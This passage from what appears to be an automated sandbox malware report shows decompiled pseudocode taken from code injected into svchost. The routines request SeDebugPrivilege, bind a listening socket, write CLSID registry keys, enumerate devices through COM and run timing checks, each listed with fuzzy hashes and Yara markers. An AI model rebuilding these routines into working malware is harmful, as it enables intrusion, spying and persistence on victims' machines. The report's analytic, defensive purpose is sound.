                                                            				long long _t167;
                                                            				long long _t168;
                                                            				void* _t169;
                                                            
                                                            				_t169 = _t164;
                                                            				_t131 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v48 = _t131 ^ _t164 - 0x00000070;
                                                            				 *((long long*)(_t169 + 0x10)) = __rbp;
                                                            				 *((long long*)(_t169 + 0x18)) = __r12;
                                                            				 *((long long*)(_t169 - 0x20)) = __r14;
                                                            				 *((long long*)(_t169 - 0x28)) = __r15;
                                                            				r14d = GetTickCount();
                                                            				_t71 = GetTickCount();
                                                            				_v88 = 0x267;
                                                            				if ( *((intOrPtr*)(__rcx + 1)) == sil) goto 0xaf534573;
                                                            				if (0x10624dd3 * (GetTickCount() - _t71) >> 0x20 >> 6 - 5 < 0) goto 0xaf53452f;
                                                            				GetTickCount();
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 8)) + 8)) == 0) goto 0xaf5344e9;
                                                            				_t168 =  *((intOrPtr*)(__rcx + 0x18));
                                                            				_t167 =  *((intOrPtr*)(__rcx + 0x20));
                                                            				_v86 = _t168;
                                                            				_v70 = _t168 -  *((intOrPtr*)(__rcx + 0x18));
                                                            				_v78 = _t167;
                                                            				r9b = 0x3f;
                                                            				_v62 = _t167 -  *((intOrPtr*)(__rcx + 0x20));
                                                            				r8d = 0x22;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(__rcx + 0x10)),  &_v88);
                                                            				_t138 =  *((intOrPtr*)(__rcx + 8));
                                                            				if ( *((short*)(_t138 + 0x16)) != 2) goto 0xaf53452f;
                                                            				_t157 = _t161;
                                                            				_t123 =  *((intOrPtr*)(_t138 + 0x1c));
                                                            				if (_t123 <= 0) goto 0xaf53452f;
                                                            				_t79 = E0000022B22BAF5643C0(_t138);
                                                            				if (_t123 >= 0) goto 0xaf534515;
                                                            				_t146 =  *((intOrPtr*)(__rcx + 8));
                                                            				 *((char*)(_t157 +  *((intOrPtr*)(_t146 + 0x40)))) = ((_t79 & 0x800000ff) - 0x00000001 | 0xffffff00) + 1;
                                                            				if (_t157 + 1 - _t146 < 0) goto 0xaf534500;
                                                            				Sleep(??);
                                                            				if (0x88888889 * (0x10624dd3 * (GetTickCount() - r14d) >> 0x20 >> 6) >> 0x20 >> 5 - ( *( *((intOrPtr*)(__rcx + 8)) + 0x14) & 0x0000ffff) < 0) goto 0xaf534569;
                                                            				 *((intOrPtr*)(__rcx + 1)) = sil;
                                                            				if ( *((intOrPtr*)(__rcx + 1)) != sil) goto 0xaf534468;
                                                            				if ( *((intOrPtr*)(__rcx + 0x50)) == _t161) goto 0xaf5345d4;
                                                            				if (0 -  *( *((intOrPtr*)(__rcx + 8)) + 0x12) >= 0) goto 0xaf5345d1;
                                                            				WaitForSingleObject(??, ??);
                                                            				CloseHandle(??);
                                                            				if (1 - ( *( *((intOrPtr*)(__rcx + 8)) + 0x12) & 0x0000ffff) < 0) goto 0xaf5345a0;
                                                            				 *__rcx = 1;
                                                            				r9b = 0x3f;
                                                            				_v88 = 0x67;
                                                            				r8d = 2;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(__rcx + 0x10)),  &_v88);
                                                            				return E0000022B22BAF55A7C0( *( *((intOrPtr*)(__rcx + 8)) + 0x14) & 0x0000ffff,  *((intOrPtr*)(__rcx + 8)), _v48 ^ _t164 - 0x00000070);
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CountTick$CloseHandleObjectSingleSleepWait
                                                            • String ID: g
                                                            • API String ID: 455057565-30677878
                                                            • Opcode ID: 53c77d12224bbc1b71423d713c8ff6aa1bb7a5c81b0a81db7ecb53307d3e0af0
                                                            • Instruction ID: cdccd48a476ac9b1b746edc36c110eb1313ff59c2d1b5f4fbd79a6e1e9093fa5
                                                            • Opcode Fuzzy Hash: 53c77d12224bbc1b71423d713c8ff6aa1bb7a5c81b0a81db7ecb53307d3e0af0
                                                            • Instruction Fuzzy Hash: 4751FE23614B80D2EB258F6AE44C29DBBA2F788F94F048116DE4D8779ACF39C840C750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            • API ID: Create$Event$CountCriticalHeapInitializeSectionSpin
                                                            • String ID: N$<$<$`
                                                            • API String ID: 1949328396-1393152752
                                                            • Opcode ID: c133e2671cc4dfce594399caa41b7cb7d14346470af3101afa89c1d99431679d
                                                            • Instruction ID: 28b5fde0ceef06e3f9aeea188526c0553dc651ea425bdb641814e97e74017062
                                                            • Opcode Fuzzy Hash: c133e2671cc4dfce594399caa41b7cb7d14346470af3101afa89c1d99431679d
                                                            • Instruction Fuzzy Hash: FB418873210B9492F76ACF78E46879933A9F744F48F184229DF590AB9ACF7A8051CB40

                                                            C-Code - Quality: 57%
                                                            			E0000022B22BAF533440(signed char __ecx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi) {
                                                            				void* _t61;
                                                            				signed char _t75;
                                                            				signed long long _t104;
                                                            				void* _t108;
                                                            				intOrPtr _t113;
                                                            				void* _t114;
                                                            				intOrPtr _t116;
                                                            				intOrPtr _t120;
                                                            				intOrPtr* _t128;
                                                            				intOrPtr _t135;
                                                            				void* _t136;
                                                            				intOrPtr* _t138;
                                                            				intOrPtr* _t139;
                                                            				intOrPtr* _t140;
                                                            				intOrPtr* _t141;
                                                            				void* _t144;
                                                            				intOrPtr* _t148;
                                                            				intOrPtr _t153;
                                                            				intOrPtr* _t156;
                                                            				void* _t158;
                                                            				void* _t159;
                                                            				void* _t161;
                                                            				signed long long _t162;
                                                            				void* _t174;
                                                            				signed long long _t176;
                                                            
                                                            				_t144 = __rdx;
                                                            				_t75 = __ecx;
                                                            				 *((long long*)(_t161 + 0x10)) = __rbx;
                                                            				 *((long long*)(_t161 + 0x18)) = __rsi;
                                                            				 *((long long*)(_t161 + 0x20)) = __rdi;
                                                            				_t159 = _t161 - 0x47;
                                                            				_t162 = _t161 - 0xa0;
                                                            				_t104 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t159 + 0x37) = _t104 ^ _t162;
                                                            				r15d = 0;
                                                            				_t156 = __rcx;
                                                            				r14d = r15d;
                                                            				if (__rcx == 0) goto 0xaf5334a0;
                                                            				_t153 =  *((intOrPtr*)(__rcx + 8));
                                                            				_t120 =  *__rcx;
                                                            				if (_t120 == _t153) goto 0xaf533499;
                                                            				_t61 = E0000022B22BAF5339E0(__ecx, _t120);
                                                            				if (_t120 + 0x20 != _t153) goto 0xaf533488;
                                                            				 *((long long*)(_t156 + 8)) =  *_t156;
                                                            				 *(_t159 - 0x11) = _t176;
                                                            				 *(_t159 - 0x19) = _t176;
                                                            				 *(_t159 - 0x29) = _t176;
                                                            				 *((long long*)(_t162 + 0x20)) = _t159 - 0x11;
                                                            				_t13 = _t144 + 1; // 0x1
                                                            				r8d = _t13;
                                                            				__imp__CoCreateInstance();
                                                            				if (_t61 < 0) goto 0xaf53364d;
                                                            				r9d = 0;
                                                            				_t108 =  *( *(_t159 - 0x11));
                                                            				if ( *((intOrPtr*)(_t108 + 0x18))() != 0) goto 0xaf53364d;
                                                            				_t17 = _t108 + 8; // 0x8
                                                            				_t128 =  *(_t159 - 0x29);
                                                            				if (_t128 == 0) goto 0xaf533517;
                                                            				 *(_t159 - 0x29) = _t176;
                                                            				 *((intOrPtr*)( *_t128 + 0x10))();
                                                            				if ( *((intOrPtr*)( *( *(_t159 - 0x19)) + 0x18))() != 0) goto 0xaf53364d;
                                                            				 *(_t159 - 0x21) = _t176;
                                                            				 *((long long*)(_t162 + 0x20)) = _t159 - 0x21;
                                                            				r8d = 0;
                                                            				if ( *((intOrPtr*)( *( *(_t159 - 0x29)) + 0x48))() < 0) goto 0xaf533635;
                                                            				 *((short*)(_t159 - 1)) = _t17;
                                                            				r9d = 0;
                                                            				if ( *((intOrPtr*)( *( *(_t159 - 0x21)) + 0x18))() < 0) goto 0xaf533635;
                                                            				_t148 =  *((intOrPtr*)(_t159 + 7));
                                                            				 *((long long*)(_t159 + 0x2f)) = 7;
                                                            				 *(_t159 + 0x27) = _t176;
                                                            				 *((intOrPtr*)(_t159 + 0x17)) = r15w;
                                                            				if ( *_t148 != r15w) goto 0xaf5335a5;
                                                            				goto 0xaf5335ba;
                                                            				if ( *((intOrPtr*)(_t148 + ((_t176 | 0xffffffff) + 1) * 2)) != r15w) goto 0xaf5335b0;
                                                            				E0000022B22BAF533B50(0xffffffff, _t159 + 0x17, _t148, _t156, (_t176 | 0xffffffff) + 1, _t176, _t174);
                                                            				__imp__#6();
                                                            				r14d = r14d + 1;
                                                            				if (_t156 == 0) goto 0xaf5335e1;
                                                            				E0000022B22BAF533880(0xffffffff, _t156, _t159 + 0x17, _t156, _t158);
                                                            				_t113 =  *((intOrPtr*)(_t159 + 0x2f));
                                                            				if (_t113 - _t153 < 0) goto 0xaf533635;
                                                            				_t135 =  *((intOrPtr*)(_t159 + 0x17));
                                                            				_t114 = _t113 + 1;
                                                            				if (_t114 - 0xffffffff > 0) goto 0xaf5336be;
                                                            				if (_t114 + _t114 - 0x1000 < 0) goto 0xaf533630;
                                                            				if ((_t75 & 0x0000001f) != 0) goto 0xaf5336b8;
                                                            				_t116 =  *((intOrPtr*)(_t135 - 8));
                                                            				if (_t116 - _t135 >= 0) goto 0xaf5336b2;
                                                            				_t136 = _t135 - _t116;
                                                            				if (_t136 - _t153 < 0) goto 0xaf5336ac;
                                                            				if (_t136 - 0x27 > 0) goto 0xaf5336a6;
                                                            				0xaf55a85c();
                                                            				_t138 =  *(_t159 - 0x21);
                                                            				if (_t138 == 0) goto 0xaf533504;
                                                            				 *((intOrPtr*)( *_t138 + 0x10))();
                                                            				goto 0xaf533504;
                                                            				_t139 =  *(_t159 - 0x29);
                                                            				if (_t139 == 0) goto 0xaf53365c;
                                                            				 *((intOrPtr*)( *_t139 + 0x10))();
                                                            				_t140 =  *(_t159 - 0x19);
                                                            				if (_t140 == 0) goto 0xaf53366b;
                                                            				 *((intOrPtr*)( *_t140 + 0x10))();
                                                            				_t141 =  *(_t159 - 0x11);
                                                            				if (_t141 == 0) goto 0xaf53367a;
                                                            				 *((intOrPtr*)( *_t141 + 0x10))();
                                                            				return E0000022B22BAF55A7C0(_t75,  *_t139,  *(_t159 + 0x37) ^ _t162);
                                                            			}

                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            • API ID: _invalid_parameter_noinfo_noreturn$CreateFreeInstanceString
                                                            • String ID: FriendlyName
                                                            • API String ID: 3051947498-3623505368
                                                            • Opcode ID: b5f6a59e4aa91acd15e0f4b48202dd26d3c59404340bd2cdb4cc0bdb31d4c61e
                                                            • Instruction ID: 0eb4ca73faabd18d3c1d78a35498e80c8bd9bb7c8c98e70310ba339ef2942e19
                                                            • Opcode Fuzzy Hash: b5f6a59e4aa91acd15e0f4b48202dd26d3c59404340bd2cdb4cc0bdb31d4c61e
                                                            • Instruction Fuzzy Hash: E2714663711A44AAFB26DFE9D06C3EC33A0EB48B98F415A11DE1A17B96DF3AC445C340

                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            • API ID: CloseCreateValue$wsprintf
                                                            • String ID: SOFTWARE\Classes\CLSID\%s\%s
                                                            • API String ID: 206570251-512145251
                                                            • Opcode ID: 42bfb82e09fd1e23d32cec216227443db27facc9d003485a6b487521fae5df74
                                                            • Instruction ID: 3e7daaddbdee6ce3bfd44d849d3ea87e4fac78e30f505897d524994535e1e111
                                                            • Opcode Fuzzy Hash: 42bfb82e09fd1e23d32cec216227443db27facc9d003485a6b487521fae5df74
                                                            • Instruction Fuzzy Hash: BA51B133608B8092D7318F65F4897DEB7A1F788794F440216EA9947A9ADF79C509CB40

                                                            C-Code - Quality: 33%
                                                            			E0000022B22BAF5564C0(void* __ecx, void* __edx, void* __rcx, intOrPtr* __rdx, long long __rbp, void* __r9, long long __r15, long long _a24) {
                                                            				long long _v40;
                                                            				signed int _v56;
                                                            				void* _v88;
                                                            				void* __rbx;
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				void* _t24;
                                                            				void* _t27;
                                                            				void* _t39;
                                                            				void* _t42;
                                                            				signed long long _t54;
                                                            				signed long long _t55;
                                                            				intOrPtr* _t70;
                                                            				void* _t73;
                                                            				void* _t74;
                                                            
                                                            				_t70 = __rdx;
                                                            				_t54 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t55 = _t54 ^  &_v88;
                                                            				_v56 = _t55;
                                                            				_t74 = __rcx;
                                                            				if (__rdx == 0) goto 0xaf5564ec;
                                                            				_t2 = _t73 + 1; // 0x1
                                                            				r14d = _t2;
                                                            				if ( *__rdx != 0) goto 0xaf5564ef;
                                                            				r14d = 0;
                                                            				_v88 = 0;
                                                            				_t58 =  !=  ? __rdx : L"0.0.0.0";
                                                            				_v88 = E0000022B22BAF54FDE0( !=  ? __rdx : L"0.0.0.0");
                                                            				_t24 = E0000022B22BAF54FED0(0,  !=  ? __rdx : L"0.0.0.0",  !=  ? __rdx : L"0.0.0.0",  &_v88);
                                                            				if (_t24 == 0) goto 0xaf5565f5;
                                                            				_t7 = _t70 + 5; // 0x6
                                                            				r8d = _t7;
                                                            				__imp__#23();
                                                            				if (_t55 == 0xffffffff) goto 0xaf5565f5;
                                                            				_a24 = __rbp;
                                                            				_v40 = __r15;
                                                            				r15d = 0x1c;
                                                            				r8d = r15d;
                                                            				r8d =  ==  ? 0x10 : r8d;
                                                            				__imp__#2();
                                                            				if (_t24 == 0xffffffff) goto 0xaf5565c8;
                                                            				E0000022B22BAF550280();
                                                            				 *(_t74 + 0x48) = _t55;
                                                            				E0000022B22BAF550320();
                                                            				 *(_t74 + 0x50) = _t55;
                                                            				if (r14d == 0) goto 0xaf5565c1;
                                                            				if ( &_v88 == _t74 + 0x78) goto 0xaf5565c1;
                                                            				_t41 =  !=  ? r15d : 0x10;
                                                            				r8d =  !=  ? r15d : 0x10;
                                                            				_t27 = E0000022B22BAF562BA0(_v88 & 0x0000ffff, 0, _t39, _t42, _t74 + 0x78,  &_v88, _t73, _t74,  &_v88);
                                                            				goto 0xaf5565dd;
                                                            				__imp__#111();
                                                            				 *((intOrPtr*)(_t74 + 0x74)) = 4;
                                                            				SetLastError(??);
                                                            				__imp__#3();
                                                            				goto 0xaf55660a;
                                                            				__imp__#111();
                                                            				 *((intOrPtr*)(_t74 + 0x74)) = 3;
                                                            				SetLastError(??);
                                                            				return E0000022B22BAF55A7C0(_t27,  &_v88, _v56 ^  &_v88);
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketsocket
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 2609815416-3771769585
                                                            • Opcode ID: 99926b02a6ac1911a3d1b1cfecf3b375f1239a906846057dafcdd092e91f4822
                                                            • Instruction ID: 8cced34ef66bf076dc9606a5683d711a4ecc31c23cc83d7d14b96f7d9660e0ac
                                                            • Opcode Fuzzy Hash: 99926b02a6ac1911a3d1b1cfecf3b375f1239a906846057dafcdd092e91f4822
                                                            • Instruction Fuzzy Hash: 2831B363200A85A3EA729F95F41C3DEB3A1FB84B94F844220DE5E0379AEF7EC4458740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Exception$Throw$FileHeaderRaisestd::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 2393553977-0
                                                            • Opcode ID: 8e73cdea62212a0212ba7422e27af5d0c0934dacf2682f8e31b08b9c191672eb
                                                            • Instruction ID: 06610a0ac5e014de170f288b6b4c09dd814123e39746b107093be87dc6301a6d
                                                            • Opcode Fuzzy Hash: 8e73cdea62212a0212ba7422e27af5d0c0934dacf2682f8e31b08b9c191672eb
                                                            • Instruction Fuzzy Hash: E151DBB7710B80AAEB2DEFB2981E1EE3356A784780F08C935B9590BB5BDF35D4118240
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 37%
                                                            			E0000022B22BAF54DBB0() {
                                                            				signed int _v16;
                                                            				void* _v40;
                                                            				void* _t9;
                                                            				signed long long _t13;
                                                            				signed long long _t19;
                                                            
                                                            				_t13 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v16 = _t13 ^ _t19;
                                                            				GetCurrentProcess();
                                                            				if (OpenProcessToken(??, ??, ??) != 0) goto 0xaf54dbf8;
                                                            				return E0000022B22BAF55A7C0(_t9, _t13 ^ _t19, _v16 ^ _t19);
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 3398352648-2896544425
                                                            • Opcode ID: 81907008b757056a952eefbc7216d2a619f775bbd32000834ab7415d27bdccaa
                                                            • Instruction ID: a182b8dd80f2cc398d5de5eaae4d5e4d8b2802a4751a762123e254d0b87122d6
                                                            • Opcode Fuzzy Hash: 81907008b757056a952eefbc7216d2a619f775bbd32000834ab7415d27bdccaa
                                                            • Instruction Fuzzy Hash: F1116073214B44A2EB218F61F85D29EB7B1FBC8B81F400116EA9E43A2ADF39C045CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 54%
                                                            			E0000022B22BAF532FA0(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9) {
                                                            				void* __r14;
                                                            				void* __r15;
                                                            				void* _t176;
                                                            				void* _t188;
                                                            				void* _t189;
                                                            				void* _t190;
                                                            				signed long long _t222;
                                                            				intOrPtr _t234;
                                                            				long long _t243;
                                                            				long long _t253;
                                                            				intOrPtr* _t256;
                                                            				intOrPtr* _t261;
                                                            				intOrPtr _t269;
                                                            				intOrPtr* _t272;
                                                            				intOrPtr _t277;
                                                            				intOrPtr* _t280;
                                                            				intOrPtr* _t284;
                                                            				intOrPtr* _t288;
                                                            				intOrPtr* _t289;
                                                            				intOrPtr* _t290;
                                                            				void* _t312;
                                                            				void* _t317;
                                                            				void* _t318;
                                                            				void* _t320;
                                                            				signed long long _t321;
                                                            				void* _t342;
                                                            				void* _t344;
                                                            
                                                            				_t314 = __rsi;
                                                            				_t253 = __rbx;
                                                            				 *((long long*)(_t320 + 0x18)) = __rsi;
                                                            				 *((long long*)(_t320 + 0x20)) = __rdi;
                                                            				_t318 = _t320 - 0x50;
                                                            				_t321 = _t320 - 0x150;
                                                            				_t222 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t318 + 0x40) = _t222 ^ _t321;
                                                            				_t312 = __rcx;
                                                            				r14d = r9d;
                                                            				_t256 =  *((intOrPtr*)(__rcx + 0xe0));
                                                            				r15d = r8d;
                                                            				_t189 = __edx;
                                                            				if (_t256 == 0) goto 0xaf532fe6;
                                                            				 *((intOrPtr*)( *_t256 + 0x48))(_t317);
                                                            				if (E0000022B22BAF532A30(__rbx, __rcx, __rdx, __rcx, __rsi, _t342, _t344, _t342) == 0) goto 0xaf533416;
                                                            				 *((long long*)(_t321 + 0x178)) = _t253;
                                                            				 *((long long*)(_t321 + 0x40)) = _t253;
                                                            				if (E0000022B22BAF5336D0(_t135, _t189, __rcx, __rcx, _t314, _t321 + 0x40, _t342, _t344) == 0) goto 0xaf5333fc;
                                                            				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0xd0)))) + 0x18))();
                                                            				E0000022B22BAF532D90(__rcx,  *((intOrPtr*)(__rcx + 0xd8)), __rcx,  *((intOrPtr*)(_t321 + 0x40)));
                                                            				 *((long long*)(_t321 + 0x38)) = _t253;
                                                            				 *((long long*)(_t321 + 0x20)) = _t321 + 0x38;
                                                            				_t18 = _t253 + 1; // 0x1
                                                            				r8d = _t18;
                                                            				__imp__CoCreateInstance();
                                                            				_t261 =  *((intOrPtr*)(_t321 + 0x38));
                                                            				if (_t261 == 0) goto 0xaf5333fc;
                                                            				 *((long long*)(_t321 + 0x48)) = _t253;
                                                            				 *((intOrPtr*)( *_t261))();
                                                            				_t23 = _t253 + 0x58; // 0x58
                                                            				r8d = _t23;
                                                            				_t263 =  <  ? _t253 :  *((intOrPtr*)(_t321 + 0x48));
                                                            				 *((long long*)(_t321 + 0x48)) =  <  ? _t253 :  *((intOrPtr*)(_t321 + 0x48));
                                                            				E0000022B22BAF563830(_t176, 0, _t188, _t190, _t321 + 0x60, 0xaf57f888, __rcx, _t321 + 0x48);
                                                            				asm("movups xmm0, [0x4c6de]");
                                                            				asm("movups xmm1, [0x4c6dd]");
                                                            				asm("movaps [esp+0x60], xmm0");
                                                            				asm("movaps [esp+0x70], xmm1");
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x38)))) + 0x20))() < 0) goto 0xaf5333dc;
                                                            				if (r15d == 0) goto 0xaf5331ea;
                                                            				if (r14d == 0) goto 0xaf5331ea;
                                                            				 *((long long*)(_t321 + 0x28)) = _t321 + 0x50;
                                                            				r8d = 0;
                                                            				 *((long long*)(_t321 + 0x50)) = _t253;
                                                            				 *((long long*)(_t321 + 0x30)) = _t253;
                                                            				 *((long long*)(_t321 + 0x20)) = 0xaf57f8b8;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t312 + 0xd8)))) + 0x30))() >= 0) goto 0xaf533168;
                                                            				r8d = 0;
                                                            				 *((long long*)(_t321 + 0x28)) = _t321 + 0x50;
                                                            				 *((long long*)(_t321 + 0x20)) = 0xaf57f8b8;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t312 + 0xd8)))) + 0x30))() < 0) goto 0xaf5331ea;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x50)))) + 0x30))() < 0) goto 0xaf5331ea;
                                                            				_t269 =  *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x30)) + 0x50));
                                                            				 *((intOrPtr*)(_t269 + 0x34)) = r15d;
                                                            				 *((intOrPtr*)(_t269 + 0x38)) = r14d;
                                                            				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x50)))) + 0x18))();
                                                            				_t234 =  *((intOrPtr*)(_t321 + 0x30));
                                                            				if (_t234 == 0) goto 0xaf5331ea;
                                                            				if ( *((intOrPtr*)(_t234 + 0x48)) == 0) goto 0xaf5331d2;
                                                            				__imp__CoTaskMemFree();
                                                            				 *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x30)) + 0x48)) = 0;
                                                            				 *((long long*)( *((intOrPtr*)(_t321 + 0x30)) + 0x50)) = _t253;
                                                            				_t272 =  *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x30)) + 0x40));
                                                            				if (_t272 == 0) goto 0xaf5331ea;
                                                            				 *((intOrPtr*)( *_t272 + 0x10))();
                                                            				 *((long long*)( *((intOrPtr*)(_t321 + 0x30)) + 0x40)) = _t253;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t312 + 0xd0)))) + 0x18))() < 0) goto 0xaf5333dc;
                                                            				 *((long long*)(_t321 + 0x28)) = _t253;
                                                            				 *((long long*)(_t321 + 0x20)) =  *((intOrPtr*)(_t321 + 0x48));
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t312 + 0xd8)))) + 0x38))() >= 0) goto 0xaf533277;
                                                            				 *((long long*)(_t321 + 0x28)) = _t253;
                                                            				 *((long long*)(_t321 + 0x20)) =  *((intOrPtr*)(_t321 + 0x48));
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t312 + 0xd8)))) + 0x38))() < 0) goto 0xaf5333dc;
                                                            				_t243 =  *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x38))));
                                                            				if ( *((intOrPtr*)(_t243 + 0x28))() < 0) goto 0xaf5333dc;
                                                            				_t277 =  *((intOrPtr*)(_t318 - 0x50));
                                                            				 *((intOrPtr*)(_t312 + 0x80)) =  *((intOrPtr*)(_t277 + 0x34));
                                                            				 *((intOrPtr*)(_t312 + 0x84)) =  *((intOrPtr*)(_t277 + 0x38));
                                                            				asm("movups xmm0, [ecx+0x30]");
                                                            				asm("movups [edi+0xa0], xmm0");
                                                            				asm("movups xmm1, [ecx+0x40]");
                                                            				asm("movups [edi+0xb0], xmm1");
                                                            				asm("movsd xmm0, [ecx+0x50]");
                                                            				asm("movsd [edi+0xc0], xmm0");
                                                            				 *(_t312 + 0xb4) = (( *(_t312 + 0xae) & 0x0000ffff) *  *(_t312 + 0xa4) + 0x0000001f >> 0x00000003 & 0xfffffffc) *  *(_t312 + 0xa8);
                                                            				if ( *((intOrPtr*)(_t312 + 0xf0)) == 0) goto 0xaf533304;
                                                            				E0000022B22BAF55A7E4(_t243,  *((intOrPtr*)(_t312 + 0xf0)));
                                                            				 *((long long*)(_t312 + 0xf0)) = _t253;
                                                            				E0000022B22BAF55A828(0,  *((intOrPtr*)(_t312 + 0xf0)));
                                                            				 *((long long*)(_t312 + 0xf0)) = _t243;
                                                            				if (_t243 == 0) goto 0xaf5333dc;
                                                            				 *((char*)(_t312 + 8)) = 0;
                                                            				if ( *((intOrPtr*)(_t318 - 0x58)) == 0) goto 0xaf53333b;
                                                            				__imp__CoTaskMemFree();
                                                            				 *((intOrPtr*)(_t318 - 0x58)) = 0;
                                                            				 *((long long*)(_t318 - 0x50)) = _t253;
                                                            				_t280 =  *((intOrPtr*)(_t318 - 0x60));
                                                            				if (_t280 == 0) goto 0xaf53334e;
                                                            				 *((intOrPtr*)( *_t280 + 0x10))();
                                                            				 *((long long*)(_t318 - 0x60)) = _t253;
                                                            				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x38)))) + 0x30))();
                                                            				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x38)))) + 0x18))();
                                                            				r8d = 1;
                                                            				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x38)))) + 0x48))();
                                                            				_t284 =  *((intOrPtr*)(_t312 + 0xe8));
                                                            				if (_t284 == 0) goto 0xaf5333dc;
                                                            				if ( *((intOrPtr*)(_t312 + 0x100)) == 0) goto 0xaf5333dc;
                                                            				if ( *((intOrPtr*)( *_t284 + 0xe8))() < 0) goto 0xaf5333dc;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t312 + 0xe8)))) + 0x48))() < 0) goto 0xaf5333dc;
                                                            				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t312 + 0xe8)))) + 0x98))();
                                                            				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t312 + 0xe0)))) + 0x38))();
                                                            				_t288 =  *((intOrPtr*)(_t321 + 0x48));
                                                            				if (_t288 == 0) goto 0xaf5333ec;
                                                            				 *((intOrPtr*)( *_t288 + 0x10))();
                                                            				_t289 =  *((intOrPtr*)(_t321 + 0x38));
                                                            				if (_t289 == 0) goto 0xaf5333fc;
                                                            				 *((intOrPtr*)( *_t289 + 0x10))();
                                                            				_t290 =  *((intOrPtr*)(_t321 + 0x40));
                                                            				if (_t290 == 0) goto 0xaf53340c;
                                                            				 *((intOrPtr*)( *_t290 + 0x10))();
                                                            				return E0000022B22BAF55A7C0( *(_t312 + 0xb4) + 4,  *_t288,  *(_t318 + 0x40) ^ _t321);
                                                            			}
                                                            0x22baf5331b0
                                                            0x22baf5331b6
                                                            0x22baf5331c1
                                                            0x22baf5331c9
                                                            0x22baf5331d2
                                                            0x22baf5331d9
                                                            0x22baf5331de
                                                            0x22baf5331e6
                                                            0x22baf533205
                                                            0x22baf53322a
                                                            0x22baf533232
                                                            0x22baf53323d
                                                            0x22baf53325e
